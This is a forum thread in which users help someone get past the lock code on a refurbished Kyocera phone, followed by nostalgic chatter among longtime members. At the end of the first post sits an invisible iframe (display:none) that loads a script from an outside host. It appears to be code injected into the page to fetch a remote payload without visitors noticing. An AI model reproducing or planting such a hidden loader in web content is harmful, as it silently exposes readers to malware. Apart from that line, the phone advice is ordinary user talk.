My phone call lock code...

I got a refurbished phone from Kyocera, which I don't think would matter, since I hot synced. I can't get into set the code, I know that I did not set the code cause I always use the same one. I tried te default 0000, but it didn't work. Any help would be helpful, Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

the fone set the code to the last four of the fone # when the fone was programmed. either OTA or manual programming does this for almost every fone known.

Lock codes are never automaticly programmed on the Kyoceras. It has to be done manually.

OTA does not support it in any form (OTASP, OTAPA)

Thumbs up heh - old thread update

I activated my new ebay-bought 6035 today, and the lock code was set to the last four of my phone number.

Of course, since the last post on this thread was two years ago, I guess a few things have changed.

(Edit: I bought two, activated one with Verizon, and the other lock code I got from the ebay seller.)

Well, this is a bit of a late reply, but hey, I'm still loving and using mine

Just took a used phone and swapped out the display module, kept the other boards from my original.

Fired it up and attempted to get into the programming using many different codes, no success.

I tried sending a text, had an issue with receiving it.

Went through VZW's OTAP and was then able to access the programming using the standard 0's (x6). Was also able to get a clean text message through as well.

I now have questions as to what these four boards contain in the way of personal cell number or esn info.

I guess all have to do some swap and testing in order to determine whats what.

In any case, the OTA cleaned up my programming access.

And yes, I'm still alive.

Off Topic but were the ones that made this forum :)

Hey Marc'T ole boy. Yeah, its good to crouse around trying to find the source of whats what on the ole 6035 board. aka (SmartphoneSource.com)

I still see some recent post still pointing to my page I still have up, which by the way, I need to fix a bad link on.

Still good info here, and was happy to add more on the phone even after all this time.

Still using the 6035 as my primary and Loving it. In fact, I keep buying up everyone elses who doesn't user theirs anymore.

After performing a swap out replacement on my screen, I've decided I'm going to do some digging on the internal boards and get some identification for them, and also find out what each one performs and were certain info is stored accordingly.

Good to hear from ya man (Big Smile on my Face)... keep an eye out, cause I'll be swim'n back soon...

Ahhhh its so good to see our legacy live on

hahaah yes we DID make this forum didnt we? maan the tdays when it was super easy to keep up with ONE major phone per 18 months.. now they are coming out every 6 months! its hard to keep up!

wow you still have the 6035... amazing!! i think i still have mine in a box somewhere... you know i still have the handsfree speakerphone for it that goes in the car... id have to look for that...

man i still like the old phones hence why i put my hitachi back on. sprint even has the image of the phone so when you go in your account that image shows up! i figured it would be a blank generic image..

wow keep it up and im pleased to see you are still hanging around and sniffing out for new fresh meat!

beth aka "lurkingforinfo" is stilil around. she has the PRO2...

great to see you!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
